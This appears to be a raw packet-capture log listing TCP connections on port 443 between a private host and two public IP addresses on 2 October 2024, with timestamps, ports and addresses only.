Oct 2, 2024 04:27:37.483146906 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.483170033 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.483192921 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.494884968 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.494973898 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.495007038 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.495063066 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.495121956 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.495176077 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.495242119 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.495292902 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.495371103 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.495420933 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.495508909 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.495584011 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.495636940 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.495688915 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.495733976 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.495785952 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.495831966 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.495884895 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.495929956 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.495978117 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.496042967 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.496102095 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.496139050 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.496193886 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.496234894 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.496292114 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.496330023 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.496380091 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.497524023 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.497575045 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.497632980 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.497689962 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.497747898 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.497801065 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.497864008 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.497914076 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.497956038 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.498009920 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.498059034 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.498105049 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.498176098 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.498233080 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.498264074 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.498315096 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.498359919 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.498408079 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.498454094 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.498503923 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.498542070 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.498599052 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.498640060 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.498686075 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.498699903 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.498743057 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.498780966 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.498831034 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.670337915 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:39.391422987 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:39.391447067 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:39.556710958 CEST	49741	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:39.556739092 CEST	443	49741	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:39.556806087 CEST	49741	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:39.557060003 CEST	49741	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:39.557070971 CEST	443	49741	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:40.944241047 CEST	443	49741	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:40.944318056 CEST	49741	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:40.990360022 CEST	49741	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:40.990364075 CEST	443	49741	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:40.990597963 CEST	49741	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:40.990602016 CEST	443	49741	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:41.334876060 CEST	443	49741	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:41.334928036 CEST	443	49741	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:41.334935904 CEST	49741	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:41.334958076 CEST	443	49741	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:41.334978104 CEST	49741	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:41.335006952 CEST	49741	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:41.335077047 CEST	443	49741	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:41.335124969 CEST	49741	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:41.351181030 CEST	443	49741	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:41.351238966 CEST	49741	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:41.383980036 CEST	443	49741	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:41.384054899 CEST	49741	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:41.421953917 CEST	443	49741	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:41.422061920 CEST	49741	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:41.571213007 CEST	443	49741	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:41.571250916 CEST	443	49741	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:41.571268082 CEST	49741	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:41.571274042 CEST	443	49741	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:41.571293116 CEST	49741	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:41.571311951 CEST	49741	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:41.571316004 CEST	443	49741	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:41.571324110 CEST	443	49741	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:41.571352959 CEST	49741	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:41.571371078 CEST	49741	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:41.571655989 CEST	49741	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:41.571666956 CEST	443	49741	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:41.584914923 CEST	49742	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:41.584934950 CEST	443	49742	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:41.585019112 CEST	49742	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:41.585181952 CEST	49742	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:41.585192919 CEST	443	49742	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:42.827442884 CEST	443	49742	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:42.827606916 CEST	49742	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:42.828051090 CEST	49742	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:42.828056097 CEST	443	49742	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:42.828211069 CEST	49742	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:42.828214884 CEST	443	49742	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:43.153466940 CEST	443	49742	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:43.153573990 CEST	443	49742	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:43.153589010 CEST	49742	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:43.153597116 CEST	443	49742	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:43.153636932 CEST	49742	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:43.153851986 CEST	443	49742	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:43.153904915 CEST	49742	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:43.153943062 CEST	443	49742	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:43.153981924 CEST	49742	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:43.153986931 CEST	443	49742	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:43.154020071 CEST	49742	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:43.154069901 CEST	443	49742	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:43.154119015 CEST	49742	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:43.154395103 CEST	49742	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:43.154406071 CEST	443	49742	39.103.20.76	192.168.2.4
Oct 2, 2024 04:28:14.044842958 CEST	49744	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:14.044976950 CEST	443	49744	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:14.045063972 CEST	49744	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:14.055874109 CEST	49744	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:14.055896044 CEST	443	49744	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:15.612987995 CEST	443	49744	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:15.613133907 CEST	49744	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:15.613636971 CEST	443	49744	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:15.613837957 CEST	49744	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:15.676532030 CEST	49744	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:15.676575899 CEST	443	49744	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:15.676831007 CEST	443	49744	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:15.676887035 CEST	49744	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:15.680591106 CEST	49744	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:15.723423004 CEST	443	49744	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:16.112250090 CEST	443	49744	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:16.112267971 CEST	443	49744	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:16.112313032 CEST	49744	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:16.112337112 CEST	443	49744	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:16.112350941 CEST	49744	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:16.112375021 CEST	49744	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:16.112627029 CEST	443	49744	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:16.112670898 CEST	49744	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:16.115034103 CEST	443	49744	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:16.115086079 CEST	49744	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:16.121803045 CEST	443	49744	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:16.121860981 CEST	49744	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:16.198945045 CEST	443	49744	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:16.199008942 CEST	49744	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:16.199093103 CEST	443	49744	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:16.199141026 CEST	49744	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:16.199259043 CEST	443	49744	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:16.199316025 CEST	49744	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:16.199340105 CEST	443	49744	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:16.199402094 CEST	49744	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:16.199968100 CEST	443	49744	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:16.200016975 CEST	49744	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:16.200237989 CEST	443	49744	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:16.200288057 CEST	49744	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:16.200289965 CEST	443	49744	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:16.200335979 CEST	49744	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:16.200367928 CEST	49744	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:16.200387955 CEST	443	49744	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:16.200400114 CEST	49744	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:16.200432062 CEST	49744	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:17.114214897 CEST	49745	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:17.114291906 CEST	443	49745	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:17.114398003 CEST	49745	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:17.114653111 CEST	49745	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:17.114684105 CEST	443	49745	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:18.756860018 CEST	443	49745	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:18.757075071 CEST	49745	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:18.757498026 CEST	49745	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:18.757515907 CEST	443	49745	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:18.757707119 CEST	49745	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:18.757718086 CEST	443	49745	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:19.189538002 CEST	443	49745	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:19.189593077 CEST	443	49745	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:19.189632893 CEST	49745	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:19.189673901 CEST	49745	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:19.190711021 CEST	49745	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:19.190735102 CEST	443	49745	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:19.201566935 CEST	49746	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:19.201612949 CEST	443	49746	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:19.201720953 CEST	49746	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:19.201920986 CEST	49746	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:19.201946974 CEST	443	49746	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:21.493029118 CEST	443	49746	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:21.493122101 CEST	49746	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:21.494064093 CEST	49746	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:21.494086981 CEST	443	49746	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:21.494522095 CEST	49746	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:21.494533062 CEST	443	49746	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:22.267893076 CEST	443	49746	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:22.267952919 CEST	443	49746	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:22.268037081 CEST	49746	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:22.268069029 CEST	443	49746	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:22.268089056 CEST	443	49746	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:22.268095970 CEST	49746	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:22.268119097 CEST	49746	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:22.268130064 CEST	443	49746	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:22.268162012 CEST	49746	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:22.268181086 CEST	49746	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:22.268389940 CEST	443	49746	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:22.268445015 CEST	49746	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:22.269577980 CEST	443	49746	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:22.269644976 CEST	49746	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:22.269670010 CEST	443	49746	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:22.269718885 CEST	49746	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:22.269889116 CEST	443	49746	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:22.269944906 CEST	49746	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:22.358643055 CEST	443	49746	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:22.358721972 CEST	49746	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:22.359287024 CEST	443	49746	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:22.359365940 CEST	49746	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:22.359919071 CEST	443	49746	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:22.359973907 CEST	49746	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:22.360052109 CEST	443	49746	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:22.360115051 CEST	49746	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:22.360797882 CEST	443	49746	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:22.360858917 CEST	49746	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:22.361596107 CEST	443	49746	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:22.361697912 CEST	49746	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:22.361804962 CEST	443	49746	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:22.361866951 CEST	49746	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:22.362389088 CEST	443	49746	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:22.362433910 CEST	443	49746	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:22.362448931 CEST	49746	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:22.362488985 CEST	49746	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:22.362689018 CEST	49746	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:22.362718105 CEST	443	49746	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:22.362740993 CEST	49746	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:22.362788916 CEST	49746	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:22.380156040 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:22.380209923 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:22.380285978 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:22.380501032 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:22.380517006 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:25.616291046 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:25.616520882 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:25.616918087 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:25.616933107 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:25.617113113 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:25.617117882 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.049428940 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.049448013 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.049521923 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.049521923 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:26.049546003 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.049571037 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:26.049590111 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:26.051877022 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.051940918 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:26.057749987 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.057825089 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:26.135885954 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.135946035 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:26.140578985 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.140635967 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:26.145335913 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.145391941 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:26.145530939 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.145586967 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:26.150263071 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.150316000 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:26.154886007 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.154944897 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:26.159564018 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.159683943 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:26.164551020 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.164608955 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:26.164830923 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.164885044 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:26.227099895 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.227210045 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:26.232033968 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.232137918 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:26.232213974 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.232263088 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:26.236952066 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.237013102 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:26.241543055 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.241595984 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:26.246267080 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.246335030 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:26.246388912 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.246458054 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:26.251106977 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.251161098 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:26.255867958 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.255948067 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:26.260677099 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.260735989 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:26.260788918 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.260838985 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.260852098 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:26.260868073 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.260885000 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.260899067 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:26.260910034 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:26.260921955 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.260931015 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.260946989 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:26.260976076 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:26.260981083 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.261022091 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:26.261102915 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.261148930 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.261154890 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:26.261161089 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.261194944 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:26.313920021 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.313985109 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:26.386111975 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.386195898 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:26.386351109 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.386424065 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:26.389004946 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.389066935 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:26.397787094 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.397842884 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:26.399374008 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.399442911 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:26.405097008 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.405152082 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:26.408107042 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.408164978 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:26.413971901 CEST	443	49748	118.178.60.61	192.168.2.4
